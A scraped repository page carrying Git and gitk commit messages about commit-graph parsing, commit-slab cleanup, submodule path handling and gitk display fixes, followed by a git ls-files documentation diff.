knowledge about the internals of the commit slab implementation, and
could itself iterate directly through all entries in the slab, and
free the additional memory. Or it could just leak the additional
memory...
Introduce deep_clear_##slabname() to allow releasing memory owned by
commit slab entries by invoking the 'void free_fn(elemtype *ptr)'
function specified as parameter for each entry in the slab.
Use it in get_shallow_commits() in 'shallow.c' to replace an
open-coded iteration over a commit slab's entries.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit-graph format specifies that "All 4-byte numbers are in
network order", but the commit-graph contains 8-byte integers as well
(file offsets in the Chunk Lookup table), and their byte order is
unspecified.
Clarify that all multi-byte integers are in network byte order.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The commit-graph file format specifies that the chunks may be in any
order. However, if the OID Lookup chunk happens to be the last one in
the file, then any command attempting to access the commit-graph data
will fail with:
fatal: invalid commit position. commit-graph is likely corrupt
In this case the error is wrong, the commit-graph file does conform to
the specification, but the parsing of the Chunk Lookup table is a bit
buggy, and leaves the field holding the number of commits in the
commit-graph zero-initialized.
The number of commits in the commit-graph is determined while parsing
the Chunk Lookup table, by dividing the size of the OID Lookup chunk
with the hash size. However, the Chunk Lookup table doesn't actually
store the size of the chunks, but it stores their starting offset.
Consequently, the size of a chunk can only be calculated by
subtracting the starting offsets of that chunk from the offset of the
subsequent chunk, or in case of the last chunk from the offset
recorded in the terminating label. This is currenly implemented in a
bit complicated way: as we iterate over the entries of the Chunk
Lookup table, we check the ID of each chunk and store its starting
offset, then we check the ID of the last seen chunk and calculate its
size using its previously saved offset if necessary (at the moment
it's only necessary for the OID Lookup chunk). Alas, while parsing
the Chunk Lookup table we only interate through the "real" chunks, but
never look at the terminating label, thus don't even check whether
it's necessary to calulate the size of the last chunk. Consequently,
if the OID Lookup chunk is the last one, then we don't calculate its
size and turn don't run the piece of code determining the number of
commits in the commit graph, leaving the field holding that number
unchanged (i.e. zero-initialized), eventually triggering the sanity
check in load_oid_from_graph().
Fix this by iterating through all entries in the Chunk Lookup table,
including the terminating label.
Note that this is the minimal fix, suitable for the maintenance track.
A better fix would be to simplify how the chunk sizes are calculated,
but that is a more invasive change, less suitable for 'maint', so that
will be done in later patches.
This additional flexibility of scanning more chunks breaks a test for
"git commit-graph verify" so alter that test to mutate the commit-graph
to have an even lower chunk count.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Submodules should be handled the same as regular directories with
respect to the presence of a trailing slash, i.e. commands like:
git diff rev1 rev2 -- $path
git rev-list HEAD -- $path
should produce the same output whether $path is 'submod' or 'submod/'.
This has been fixed in commit 74b4f7f277 (tree-walk.c: ignore trailing
slash on submodule in tree_entry_interesting(), 2014-01-23).
Unfortunately, that commit had the unintended side effect to handle
'submod/anything' the same as 'submod' and 'submod/' as well, e.g.:
$ git log --oneline --name-only -- sha1collisiondetection/whatever
4125f78222 sha1dc: update from upstream
sha1collisiondetection
07a20f569b Makefile: fix unaligned loads in sha1dc with UBSan
sha1collisiondetection
23e37f8e9d sha1dc: update from upstream
sha1collisiondetection
86cfd61e6b sha1dc: optionally use sha1collisiondetection as a submodule
sha1collisiondetection
Fix this by rejecting submodules as partial pathnames when their
trailing slash is followed by anything.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, submodule diffs can cause the diff context menu to fail
to appear because of a couple bugs in parseblobdiffline:
* it appends the submodule name to ctext_file_lines instead of
a line number, which breaks the binary search in find_ctext_fileinfo;
* it can desynchronize ctext_file_names and ctext_file_lines
by appending to the former but not the latter, which also breaks
find_ctext_fileinfo.
Fix both of these.
Note: a side effect of this patch is that the context menu also
starts appearing when you right-click on submodule diffs (and not just
regular diffs). The menu is non-functional in this case, though,
since you can't run blame on submodules.
Signed-off-by: Роман Донченко <dpb@corrigendum.ru>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
The recently introduced background for the tags that highlight
added and removed text takes precedence over the background color
of the selection. But selected text is more important than the
highlighted text. Make the highlighting tags the lowest priority.
The same argument holds for the file separator and the highlight
of search results. Therefore, make them also low-priority. But
search results are a bit more important; therefore, keep them
above the other tags.
Signed-off-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Not using colored background for added and removed lines is a missed
opportunity to make diff lines easier to grasp visually.
Use a subtle red/green background by default. Make the font slightly darker
to improve contrast.
Signed-off-by: Stefan Dotterweich <stefandotterweich@gmx.de>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
784b7e2f ("gitk: Fix "External diff" with separate work tree",
2011-04-04) added an unconditional call to "git rev-parse
--show-toplevel" to set up a global variable quite early in the
course of the program, so that the location of the working tree can
later be known if/when the user chooses to run the external diff via
the external_diff_get_one_file proc. Before that change, the
external diff code used to assume that the parent directory of ".git"
directory is the top-level of the working tree.
Recent versions of git however notices that "rev-parse --show-toplevel"
executed in a bare repository is an error, which makes gitk stop,
even before the user could attempt to run external diff.
Use the gitworktree helper introduced in 65bb0bda ("gitk: Fix the
display of files when filtered by path", 2011-12-13), which is
prepared to see failures from "rev-parse --show-toplevel" and other
means it tries to find the top-level of the working tree instead to
work around this issue. The resulting value in $worktree global,
when run in a bare repository, is bogus, but the code is not
prepared to run external diff correctly without a working tree
anyway ;-)
[paulus@ozlabs.org - folded in fix from Eric Sunshine]
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Bug was: gitk would overwrite the botwidth setting in .gitk with
a nonsense value when not using tk themes. Moving the affected
line within the conditional results in the expected behavior.
Signed-off-by: Eric Huber <echuber2@illinois.edu>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
gitk applies submodule highlighting (coloring lines starting with
" >" and " <") when `currdiffsubmod` is not an empty string.
However, it fails to reset `currdiffsubmod` after a submodule diff
ends, so any file diffs following a submodule diff will still be
highlighted as if they were submodule diffs.
There are two problems with the way gitk tries to reset `currdiffsubmod`:
1. The code says `set $currdiffsubmod` instead of `set currdiffsubmod`,
so it actually sets the variable whose name is the submodule path
instead.
2. It tries to do it after the first line in a submodule diff, which
is incorrect, since submodule diffs can contain multiple lines.
Fix this by resetting `currdiffsubmod` when a file diff starts.
Signed-off-by: Роман Донченко <dpb@corrigendum.ru>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
After "git checkout -b '漢字'" to create a branch with UTF-8
character in it, "gitk" shows the branch name incorrectly, as it
forgets to turn the bytes read from the "git show-ref" command
into Unicode characters.
Signed-off-by: Kazuhiro Kato <kato-k@ksysllc.co.jp>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Now that the commit reference format has a canonical name, let's use this
name in gitk's UI and implementation.
Signed-off-by: Beat Bolli <dev+git@drbeat.li>
[dl: based the patch on gitk's tree]
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
2019-12-15 15:21:59 +11:00
1413 changed files with 152209 additions and 79866 deletions
This merges the file listing in the directory cache index with the
actual working directory list, and shows different combinations of the
two.
This merges the file listing in the index with the actual working
directory list, and shows different combinations of the two.
One or more of the options below may be used to determine the files
shown:
@ -81,6 +81,13 @@ OPTIONS
\0 line termination on output and do not quote filenames.
See OUTPUT below for more information.
--deduplicate::
When only filenames are shown, suppress duplicates that may
come from having multiple stages during a merge, or giving
`--deleted` and `--modified` option at the same time.
When any of the `-t`, `--unmerged`, or `--stage` option is
in use, this option has no effect.
-x <pattern>::
--exclude=<pattern>::
Skip untracked files matching pattern.
@ -153,7 +160,8 @@ a space) at the start of each line:
--abbrev[=<n>]::
Instead of showing the full 40-byte hexadecimal object
lines, show only a partial prefix.
lines, show the shortest prefix that is at least '<n>'
hexdigits long that uniquely refers the object.
Non default number of digits can be specified with --abbrev=<n>.
--debug::
Some files were not shown because too many files have changed in this diff
Show More
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.